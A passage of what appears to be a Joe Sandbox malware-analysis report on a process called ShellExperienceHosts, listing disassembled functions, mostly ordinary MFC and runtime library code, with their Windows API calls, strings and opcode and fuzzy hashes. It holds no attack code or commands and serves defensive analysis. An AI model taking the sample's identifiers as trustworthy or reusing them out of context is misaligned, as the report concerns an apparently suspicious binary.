                                                                            • String ID: %TsMFCToolBar-%d$%TsMFCToolBar-%d%x$MFCToolBars
                                                                            • API String ID: 3879667756-2016111687
                                                                            • Opcode ID: 95cff219c02e16beebd79089500ab97ab006565715245906941e9da0ba6215ac
                                                                            • Instruction ID: e16057b2c041c07fa4d8529d71d3ebebb615e108477f2e719e4f62fd57d407eb
                                                                            • Opcode Fuzzy Hash: 95cff219c02e16beebd79089500ab97ab006565715245906941e9da0ba6215ac
                                                                            • Instruction Fuzzy Hash: C021B171A00219ABCF10DFA4CE889FEB735BF45318F140A69E82167780DB719D09DB51
                                                                            Function 6C7A0DD8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6C73863C: LoadLibraryW.KERNEL32(?,6C8DC788,00000010,6C738AB6,?), ref: 6C73867D
                                                                            • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 6C7A0E17
                                                                            • FreeLibrary.KERNEL32(00000000,?,0000003C,6C812B1C,?,6C8134D3,00000000,?,00000000), ref: 6C7A0E63
                                                                              • Part of subcall function 6C7A0A16: GetLastError.KERNEL32(6C7A0E0E,comctl32.dll,00000000,?,0000003C,6C812B1C,?,6C8134D3,00000000,?,00000000), ref: 6C7A0A16
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressErrorFreeLastLoadProc
                                                                            • String ID: DllGetVersion$comctl32.dll
                                                                            • API String ID: 2540614322-3857068685
                                                                            • Opcode ID: f328fe2a5df874d283d87ba7879fff46d3e3f1157ffe5e2961ec90d4e4b0e9c6
                                                                            • Instruction ID: 35795278caac2833d456697bf897d87dee11226d35a0a715dd0e6ee260dbcf03
                                                                            • Opcode Fuzzy Hash: f328fe2a5df874d283d87ba7879fff46d3e3f1157ffe5e2961ec90d4e4b0e9c6
                                                                            • Instruction Fuzzy Hash: 82112775A046099BCB11EFA8C948BDFBBB9BF85314F000825E502E7341DB34D905CBA1
                                                                            Function 02243A27 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ___BuildCatchObject.LIBCMT ref: 02243A3A
                                                                              • Part of subcall function 02243995: ___BuildCatchObjectHelper.LIBCMT ref: 022439CB
                                                                            • _UnwindNestedFrames.LIBCMT ref: 02243A51
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: BuildCatchObject$FramesHelperNestedUnwind
                                                                            • String ID: csm$csm
                                                                            • API String ID: 3487967840-3733052814
                                                                            • Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                            • Instruction ID: addaddfe7b6b39820a29a6e103554e9e5755f024555016a252ce033b89da581e
                                                                            • Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                            • Instruction Fuzzy Hash: 4701463101021ABBDF1AAF91CC48EEB7F6AEF08354F608151BD1825164EB36D9B1DFA0
                                                                            Function 6C7A0B66 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowLongW.USER32(6C7A9C68,000000F0), ref: 6C7A0B81
                                                                            • GetClassNameW.USER32(6C7A9C68,?,0000000A), ref: 6C7A0B96
                                                                            • CompareStringW.KERNEL32(0000007F,00000001,?,000000FF,combobox,000000FF,?,?,?,000000FF,6C7A9C68,6C741795,00000000), ref: 6C7A0BAD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ClassCompareLongNameStringWindow
                                                                            • String ID: combobox
                                                                            • API String ID: 1414938635-2240613097
                                                                            • Opcode ID: 758065694a0b21bb40dac77d413639d46693cde824ca514ba0083147266dfea5
                                                                            • Instruction ID: 4f40730b636d087772fabbb07a242f693f01788bb4a2cb70d3e093ef7710ba40
                                                                            • Opcode Fuzzy Hash: 758065694a0b21bb40dac77d413639d46693cde824ca514ba0083147266dfea5
                                                                            • Instruction Fuzzy Hash: C5F0A431755219BBCF10DBA8CD45EAE77B8AB07728F500735F522E71C0DA24A905C799
                                                                            Function 6C6EEC7A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • swprintf.LIBCMT ref: 6C6EECA4
                                                                            • GetFileAttributesW.KERNEL32(?,6C764AD4,?), ref: 6C6EECAF
                                                                            • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,6C771DF0,?,afx,?,00000104,?,?,00000000), ref: 6C6EECC7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: File$AttributesNameTempswprintf
                                                                            • String ID: %s%s%X.tmp
                                                                            • API String ID: 2659213859-596088238
                                                                            • Opcode ID: 4cef556f1a9d03a98d143dc6fd7355c0d7db3dfe29a713a1e70703f378f5a5f4
                                                                            • Instruction ID: 2476950a83af0157240c6cbe72b8a86de2620adbfa377141a809a1c0656f27aa
                                                                            • Opcode Fuzzy Hash: 4cef556f1a9d03a98d143dc6fd7355c0d7db3dfe29a713a1e70703f378f5a5f4
                                                                            • Instruction Fuzzy Hash: C8F0583250020ABBCF019F95CE09ECD3F36FF083A9F104951FA20A04A0D736DA24AB88
                                                                            Function 6C86E463 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6C86E4FF,00000000,?,6C8F553C,?,?,?,6C86E436,00000004,InitializeCriticalSectionEx,6C8B7644,6C8B764C), ref: 6C86E470
                                                                            • GetLastError.KERNEL32(?,6C86E4FF,00000000,?,6C8F553C,?,?,?,6C86E436,00000004,InitializeCriticalSectionEx,6C8B7644,6C8B764C,00000000,?,6C8634BC), ref: 6C86E47A
                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6C86E4A2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad$ErrorLast
                                                                            • String ID: api-ms-
                                                                            • API String ID: 3177248105-2084034818
                                                                            • Opcode ID: 8c5ea90ca285d41c1ecaafb7266f881007b0775e5cfce2a3f5dd2b4ab1b992ad
                                                                            • Instruction ID: b782c55c4479f6a036deb0d1d2318082ceec00eedc1a89895203b25ee692224a
                                                                            • Opcode Fuzzy Hash: 8c5ea90ca285d41c1ecaafb7266f881007b0775e5cfce2a3f5dd2b4ab1b992ad
                                                                            • Instruction Fuzzy Hash: 44E01230344609BBEB301A66DD09B593A64AF01779F244830F90DA8D94D765E85097C9
                                                                            Function 6C79EEF7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6C6B21FE: InitializeCriticalSectionEx.KERNEL32(6C8F0E84,00000000,00000000,EFCA8B15,?,?,?,6C6B10B9), ref: 6C6B2273
                                                                              • Part of subcall function 6C6B21FE: GetLastError.KERNEL32(EFCA8B15,?,?,?,6C6B10B9), ref: 6C6B22AB
                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,6C6E0B04), ref: 6C79EF2A
                                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,6C6E0B04), ref: 6C79EF39
                                                                            Strings
                                                                            • MZx, xrefs: 6C79EEFF
                                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 6C79EF34
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule$MZx
                                                                            • API String ID: 3511171328-1466369552
                                                                            • Opcode ID: 882b1e96545cd092ac0f427e92b30b5037da94affcea571cb9290fcf566eea83
                                                                            • Instruction ID: 06c7b42e6b3be86a9fdaea24aa60e2747ba2ee781ec2c6b6ae871a4aceadadea
                                                                            • Opcode Fuzzy Hash: 882b1e96545cd092ac0f427e92b30b5037da94affcea571cb9290fcf566eea83
                                                                            • Instruction Fuzzy Hash: 36E039702047508BD7708F28E6087967AE4AB05358F008C6DD456D2B40EBB8E888CBA1
                                                                            Function 6C6F6A43 Relevance: 6.2, APIs: 4, Instructions: 230windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C6F6A4A
                                                                            • SendMessageW.USER32(?,00000229,00000000,00000000), ref: 6C6F6A7D
                                                                            • GetWindow.USER32(?,00000005), ref: 6C6F6B8C
                                                                              • Part of subcall function 6C6F6261: BringWindowToTop.USER32(?), ref: 6C6F6301
                                                                              • Part of subcall function 6C6F6261: RedrawWindow.USER32(?,00000000,00000000,00000585), ref: 6C6F6355
                                                                              • Part of subcall function 6C6F6261: RedrawWindow.USER32(00000000,00000000,00000000,00000585), ref: 6C6F6361
                                                                            • GetWindow.USER32(?,00000002), ref: 6C6F6BE6
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Redraw$BringH_prolog3MessageSend
                                                                            • String ID:
                                                                            • API String ID: 259967589-0
                                                                            • Opcode ID: d1e77baa5ed2107b3a26cbd51e124001af9575264f1884dc436fda52f36bf585
                                                                            • Instruction ID: 6637a7be27088c0b95498f21e8556f611743c3c1e03f58526c4bd4e0371e87ef
                                                                            • Opcode Fuzzy Hash: d1e77baa5ed2107b3a26cbd51e124001af9575264f1884dc436fda52f36bf585
                                                                            • Instruction Fuzzy Hash: A181D631A00215ABDF159F60C998BEE7772BF49318F140179EC25EBB80DF759906CB98
                                                                            Function 6C70EA23 Relevance: 6.2, APIs: 4, Instructions: 190COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C70EA2A
                                                                            • SelectObject.GDI32(?,0000E831), ref: 6C70EBF7
                                                                              • Part of subcall function 6C6E2BB1: __EH_prolog3.LIBCMT ref: 6C6E2BB8
                                                                              • Part of subcall function 6C6E2BB1: GetDC.USER32(00000000), ref: 6C6E2BE4
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 6C70EAE8
                                                                            • GetSystemMetrics.USER32(00000000), ref: 6C70EBBC
                                                                              • Part of subcall function 6C70E793: GetTextExtentPoint32W.GDI32(?,0000007D,00000001,00000000), ref: 6C70E7A5
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: H_prolog3ObjectSelect$ExtentMetricsPoint32SystemText
                                                                            • String ID:
                                                                            • API String ID: 182195805-0
                                                                            • Opcode ID: 50d6c38db57b065413d32dc1d9e32bee73fd8e72fcbafc53d2d0253613edc1f5
                                                                            • Instruction ID: 1e0d73f0e14c66abc1f0b7cc133cb23c9bc894f80a10daa1858b737c1acf9703
                                                                            • Opcode Fuzzy Hash: 50d6c38db57b065413d32dc1d9e32bee73fd8e72fcbafc53d2d0253613edc1f5
                                                                            • Instruction Fuzzy Hash: 987192B0A002099FDB04CF69C988FAEBBF5BF89314F11416DE456AB791DB70D905CB94
                                                                            Function 6C6F6D26 Relevance: 6.2, APIs: 4, Instructions: 181COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Parent$H_prolog3_Window
                                                                            • String ID:
                                                                            • API String ID: 3354660761-0
                                                                            • Opcode ID: 57d7e1d99eb49b98083f9a8adbb8187aec04c833e04296313e7cd3f2fcf5d1be
                                                                            • Instruction ID: af248951aa601b9c15f85c73a8e3a3a021ca7b6e82d8d9a6abfeaba2aeeb0b9c
                                                                            • Opcode Fuzzy Hash: 57d7e1d99eb49b98083f9a8adbb8187aec04c833e04296313e7cd3f2fcf5d1be
                                                                            • Instruction Fuzzy Hash: F351D4317052149BDF159F60C988AED37B3AF49718F180179EC25EBA91DF31C8468769
                                                                            Function 6C6FE470 Relevance: 6.2, APIs: 4, Instructions: 176COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Empty$Client
                                                                            • String ID:
                                                                            • API String ID: 1457177775-0
                                                                            • Opcode ID: 09fa670366a9521a4e966493d836c01ef5655532915f4ef5afe1e629688460c3
                                                                            • Instruction ID: cc8de3078dd3cd6eeb41de325d7b0fce987da920fc3d5b2330fe6a9aff030b57
                                                                            • Opcode Fuzzy Hash: 09fa670366a9521a4e966493d836c01ef5655532915f4ef5afe1e629688460c3
                                                                            • Instruction Fuzzy Hash: 2B612E71B002199FCF04DFA8C998AEDBBB6BF49318F144269E815E7780DB34AD05CB94
                                                                            Function 6C7C4D33 Relevance: 6.2, APIs: 4, Instructions: 172windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C7C4D3A
                                                                            • SendMessageW.USER32(?,00000146,00000000,00000000), ref: 6C7C4EBF
                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 6C7C4F03
                                                                            • SendMessageW.USER32(?,00000146,00000000,00000000), ref: 6C7C4F35
                                                                              • Part of subcall function 6C6FAC48: __EH_prolog3_GS.LIBCMT ref: 6C6FAC52
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$H_prolog3H_prolog3_
                                                                            • String ID:
                                                                            • API String ID: 1270747201-0
                                                                            • Opcode ID: 64df5ef8904ee392a0036c1830065d53b924da157fe1d95d7f5a36f0575b9879
                                                                            • Instruction ID: 32d6070cc930d2a2d0e719d7cd22e5b0514a28b5c9e125e6a49708338ed8a9bd
                                                                            • Opcode Fuzzy Hash: 64df5ef8904ee392a0036c1830065d53b924da157fe1d95d7f5a36f0575b9879
                                                                            • Instruction Fuzzy Hash: 8D617F35601215DBCF05DF20C998EED3776BF89318F0440B9ED1AAB756CB30A909CBA9
                                                                            Function 6C862B9C Relevance: 6.2, APIs: 4, Instructions: 168COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: AdjustPointer
                                                                            • String ID:
                                                                            • API String ID: 1740715915-0
                                                                            • Opcode ID: 2ecedd5ceaf2937ae4366373abe14ac297241fb566547e1bd0f81e8851a8d8e6
                                                                            • Instruction ID: 9d4b56ea71e0d35fb597f4b251101f41927317dc488e8d7090efdc24aa5c913c
                                                                            • Opcode Fuzzy Hash: 2ecedd5ceaf2937ae4366373abe14ac297241fb566547e1bd0f81e8851a8d8e6
                                                                            • Instruction Fuzzy Hash: D4512771605606AFDB398F16C648BAA73A4FF0031CF214EADD91597E90D739E880C790
                                                                            Function 6C86A93C Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 05c3d199acf961cd350fbe80a70cd58fa930699b357473c6f4d375fb978d9222
                                                                            • Instruction ID: ba02511891251a41a2cfb55b9f4c67137237929a4d922ea744ecc0cdef7eb0a0
